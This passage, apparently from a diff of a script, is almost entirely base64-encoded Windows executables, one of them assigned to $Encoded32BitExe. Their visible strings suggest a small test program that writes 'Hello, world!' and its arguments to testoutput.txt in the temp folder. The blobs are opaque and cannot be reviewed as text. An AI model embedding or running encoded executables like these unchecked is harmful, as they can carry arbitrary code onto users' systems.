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AAWJgAAAAAAACQmAAAAAAAAMiYAAAAAAAAmJQAAAAAAABQlAAAAAAAABCUAAAAAAAD2JAAAAAAAAOgkAAAAAAAAhCUAAAAAAAAAAAAAAAAAAIgAQ3JlYXRlRmlsZUEAIgFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBADQFV3JpdGVGaWxlAEwCR2V0UHJvY0FkZHJlc3MAABsCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAFgBX1hjcHRGaWx0ZXIA8gFfYW1zZ19leGl0AACnAV9fZ2V0bWFpbmFyZ3MAzgFfX3NldF9hcHBfdHlwZQAAGAZleGl0AABYAl9leGl0AAoCX2NleGl0AAAaAl9jb25maWd0aHJlYWRsb2NhbGUA0AFfX3NldHVzZXJtYXRoZXJyAADiAl9pbml0dGVybV9lAOECX2luaXR0ZXJtAFwBX19DX3NwZWNpZmljX2hhbmRsZXIAAKgBX19pbml0ZW52AHgCX2Ztb2RlAAAZAl9jb21tb2RlAAAzAT90ZXJtaW5hdGVAQFlBWFhaAJkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAWwNfbG9jawDHBF91bmxvY2sACQJfY2FsbG9jX2NydACfAV9fZGxsb25leGl0AAIEX29uZXhpdADuAEVuY29kZVBvaW50ZXIAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAywFHZXRDdXJyZW50VGhyZWFkSWQAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAywBEZWNvZGVQb2ludGVyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD+/////////wAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+	$Encoded32BitExe = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADrbTR2rwxaJa8MWiWvDFol6V2HJa0MWiXpXYUlrgxaJelduiW8DFol6V27Ja0MWiWmdMklrAxaJa8MWyWGDFoljXW+Ja4MWiWNdYQlrgxaJVJpY2ivDFolAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAxLY+VgAAAAAAAAAA4AACAQsBDAAACgAAAAwAAAAAAAB/EwAAABAAAAAgAAAAAEAAABAAAAACAAAFAAEAAAAAAAUAAQAAAAAAAFAAAAAEAAAAAAAAAwBAgQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAzCEAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAZAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCEAAEAAAAAAAAAAAAAAAAAgAACsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABMCQAAABAAAAAKAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAnAUAAAAgAAAABgAAAA4AAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAIQDAAAAMAAAAAIAAAAUAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAABkAQAAAEAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEAEAAKHYIEAAiUX4ZqHcIEAAVmaJRfyg3iBAAGjgIEAAaOwgQACIRf7/FRAgQABQ/xUMIEAAi/CF9g+ExwAAAGgCAQAAjYXw/v//UI1F+FD/FQQgQACFwA+EqQAAAGj0IEAAjYXw/v//aAIBAABQ/9aDxAyFwA+FiwAAAFdQaIAAAABqAlBqB2gWARIAjYXw/v//UP8VACBAAIv4hf90X1OLHQggQABqAGoAag5oBCFAAFf/04tFCIP4AX46vgEAAACLRQyLFLCLwo1IAYlN9IoIQITJdfkrRfRqAGoAUFJX/9NqAGoAagFoFCFAAFf/00Y7dQh8y1f/FRQgQABbXzPAXovlXcO4AQAAAF6L5V3DuE1aAABmOQUAAEAAdAQzwOs0iw08AEAAgbkAAEAAUEUAAHXquAsBAABmOYEYAEAAddwzwIO5dABAAA52CTmB6ABAAA+VwGoBoygwQAD/FZQgQABZav//FTAgQACLDUwgQACjeDNAAKN8M0AAoUwwQACJAYsNUCBAAKFAMEAAiQHoLAUAAOhEAgAAgz0AMEAAAHUMaOQTQAD/FTwgQABZ6E0FAACDPRAwQAD/dQlq//8VVCBAAFkzwMNo5xZAAOjZBAAAoUgwQADHBCQ8MEAA/zVEMEAAozwwQABoNDBAAGgwMEAAaCwwQAD/FZggQACDxBSjODBAAIXAeQhqCOjGAQAAWcNqDGhwIUAA6BoFAAAz24ld/GShGAAAAItQBIv7vnAzQACLyjPA8A+xDoXAdAs7wnXwM/ZGi/7rAzP2Rjk1dDNAAHUKah/oegEAAFnrOjkddDNAAHUsiTV0M0AAaMggQABouCBAAOiqBAAAWVmFwHQXx0X8/v///7j/AAAA6d4AAACJNSAwQAA5NXQzQAB1G2i0IEAAaKwgQADofAQAAFlZxwV0M0AAAgAAAIX/dQkzwLlwM0AAhwGDPYAzQAAAdBlogDNAAOhcAQAAWYXAdApTagJT/xWAM0AAiw00MEAAoUggQACJCP81NDBAAP81MDBAAP81LDBAAOjp/P//g8QMoyQwQACDPSgwQAAAdTZQ/xWQIEAAi03siwGLAIlF5FFQ6JgAAABZWcOLZeiLReSjJDBAAIM9KDBAAAB1B1D/FYwgQACDPSAwQAAAdQv/FYggQAChJDBAAMdF/P7////oBwQAAMPorQEAAOmR/v//VYvsi0UIiwCBOGNzbeB1JYN4EAN1H4tAFD0gBZMZdBs9IQWTGXQUPSIFkxl0DT0AQJkBdAYzwF3CBADo8wMAAMxoiRNAAOjuAwAAWTPAw/8loCBAAP8lnCBAADPAw8zMzMzMzMzMzFWL7ItFCDPSU1ZXi0g8A8gPt0EUD7dZBoPAGAPBhdt0G4t9DItwDDv+cgmLSAgDzjv5cgpCg8AoO9Ny6DPAX15bXcPMzMzMzMzMzMzMzMzMVYvsav5okCFAAGiZF0AAZKEAAAAAUIPsCFNWV6EYMEAAMUX4M8VQjUXwZKMAAAAAiWXox0X8AAAAAGgAAEAA6HwAAACDxASFwHRUi0UILQAAQABQaAAAQADoUv///4PECIXAdDqLQCTB6B/30IPgAcdF/P7///+LTfBkiQ0AAAAAWV9eW4vlXcOLReyLADPJgTgFAADAD5TBi8HDi2Xox0X8/v///zPAi03wZIkNAAAAAFlfXluL5V3DzMzMzMzMVYvsi0UIuU1aAABmOQh0BDPAXcOLSDwDyDPAgTlQRQAAdQy6CwEAAGY5URgPlMBdw1WL7IPsFINl9ACDZfgAoRgwQABWV79O5kC7vgAA//87x3QNhcZ0CffQoxwwQADrZo1F9FD/FSAgQACLRfgzRfSJRfz/FSQgQAAxRfz/FSggQAAxRfyNRexQ/xUsIEAAi03wjUX8M03sM038M8g7z3UHuU/mQLvrEIXOdQyLwQ0RRwAAweAQC8iJDRgwQAD30YkNHDBAAF9ei+Vdw4M9fDNAAAB0AzPAw1ZqBGog/xVkIEAAWVmL8Fb/FTAgQACjfDNAAKN4M0AAhfZ1BWoYWF7DgyYAM8Bew2oUaLAhQADoKwEAAINl3AD/NXwzQACLNRwgQAD/1olF5IP4/3UM/3UI/xVsIEAAWetlagjohgEAAFmDZfwA/zV8M0AA/9aJReT/NXgzQAD/1olF4I1F4FCNReRQ/3UIizUwIEAA/9ZQ6F4BAACDxAyL+Il93P915P/Wo3wzQAD/deD/1qN4M0AAx0X8/v///+gLAAAAi8fo4AAAAMOLfdxqCOgeAQAAWcNVi+z/dQjoTP////fYWRvA99hIXcNWV75kIUAAv2QhQADrC4sGhcB0Av/Qg8YEO/dy8V9ew1ZXvmwhQAC/bCFAAOsLiwaFwHQC/9CDxgQ793LxX17DVmgAAAMAaAAAAQAz9lboxgAAAIPEDIXAdQJew1ZWVlZW6K0AAADM/yVAIEAA/yVEIEAAzMzMzMzMaJkXQABk/zUAAAAAi0QkEIlsJBCNbCQQK+BTVlehGDBAADFF/DPFUIll6P91+ItF/MdF/P7///+JRfiNRfBkowAAAADDi03wZIkNAAAAAFlfX15bi+VdUcNVi+z/dRT/dRD/dQz/dQho5hdAAGgYMEAA6D8AAACDxBhdw/8lpCBAAP8lWCBAAP8lXCBAAP8lYCBAAP8laCBAAP8lcCBAAP8ldCBAADsNGDBAAHUC88PpRAAAAMz/JXggQABVi+z/FRggQABqAaNsM0AA6CMBAAD/dQjoIQEAAIM9bDNAAABZWXUIagHoCQEAAFloCQQAwOgKAQAAWV3DVYvsgewkAwAAahfo/QAAAIXAdAVqAlnNKaNQMUAAiQ1MMUAAiRVIMUAAiR1EMUAAiTVAMUAAiT08MUAAZowVaDFAAGaMDVwxQABmjB04MUAAZowFNDFAAGaMJTAxQABmjC0sMUAAnI8FYDFAAItFAKNUMUAAi0UEo1gxQACNRQijZDFAAIuF3Pz//8cFoDBAAAEAAQChWDFAAKNcMEAAxwVQMEAACQQAwMcFVDBAAAEAAADHBWAwQAABAAAAagRYa8AAx4BkMEAAAgAAAGoEWGvAAIsNGDBAAIlMBfhqBFjB4ACLDRwwQACJTAX4aNAgQADozP7//4vlXcP/JXwgQAD/JYAgQAD/JYQgQAD/JTQgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0IgAAwiIAAN4iAADqIgAA/CIAABAjAABsJQAAXCUAAEIlAAAsJQAAFiUAAPwkAADsJAAAgCUAAAAAAACaIwAAriMAALwjAADIIwAA1CMAAN4jAACEIwAA/iMAADAkAAA4JAAAQiQAAFAkAABeJAAAaCQAAHokAACKJAAApCQAALokAADUJAAAeiMAAHIjAABqIwAAWCMAAEgjAAA6IwAALCMAAOojAAAAAAAAAAAAAM8RQAAAAAAAAAAAABYRQADNFUAAyhNAAAAAAAAAAAAAUDBAAKAwQAAlVEVNUCUAAHN0cmNhdF9zAAAAAG50ZGxsAAAAXHRlc3RvdXRwdXQudHh0AEhlbGxvLCB3b3JsZCEgAAAgAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7///8AAAAA1P///wAAAAD+////LxNAAEMTQAAAAAAA/v///wAAAADY////AAAAAP7////JFEAA3BRAAAAAAAD+////AAAAAMz///8AAAAA/v///wAAAACmFkAACCIAAAAAAAAAAAAAHiMAAAAgAABEIgAAAAAAAAAAAAAiJAAAPCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtCIAAMIiAADeIgAA6iIAAPwiAAAQIwAAbCUAAFwlAABCJQAALCUAABYlAAD8JAAA7CQAAIAlAAAAAAAAmiMAAK4jAAC8IwAAyCMAANQjAADeIwAAhCMAAP4jAAAwJAAAOCQAAEIkAABQJAAAXiQAAGgkAAB6JAAAiiQAAKQkAAC6JAAA1CQAAHojAAByIwAAaiMAAFgjAABIIwAAOiMAACwjAADqIwAAAAAAAIgAQ3JlYXRlRmlsZUEAHAFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBACUFV3JpdGVGaWxlAEUCR2V0UHJvY0FkZHJlc3MAABUCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAGsBX1hjcHRGaWx0ZXIAFwJfYW1zZ19leGl0AAC2AV9fZ2V0bWFpbmFyZ3MA8gFfX3NldF9hcHBfdHlwZQAATgZleGl0AACDAl9leGl0AC8CX2NleGl0AABAAl9jb25maWd0aHJlYWRsb2NhbGUA9AFfX3NldHVzZXJtYXRoZXJyAAANA19pbml0dGVybV9lAAwDX2luaXR0ZXJtALcBX19pbml0ZW52AKICX2Ztb2RlAAA/Al9jb21tb2RlAAA1AT90ZXJtaW5hdGVAQFlBWFhaAKkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAlANfbG9jawAEBV91bmxvY2sALgJfY2FsbG9jX2NydACuAV9fZGxsb25leGl0ADoEX29uZXhpdAAUA19pbnZva2Vfd2F0c29uAABDAl9jb250cm9sZnBfcwAAegJfZXhjZXB0X2hhbmRsZXI0X2NvbW1vbgBQAl9jcnRfZGVidWdnZXJfaG9vawAArAFfX2NydFVuaGFuZGxlZEV4Y2VwdGlvbgCrAV9fY3J0VGVybWluYXRlUHJvY2VzcwDqAEVuY29kZVBvaW50ZXIApwNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDBAUdldEN1cnJlbnRQcm9jZXNzSWQAxQFHZXRDdXJyZW50VGhyZWFkSWQAAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAygBEZWNvZGVQb2ludGVyAAADSXNEZWJ1Z2dlclByZXNlbnQABANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA/v////////9O5kC7sRm/RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA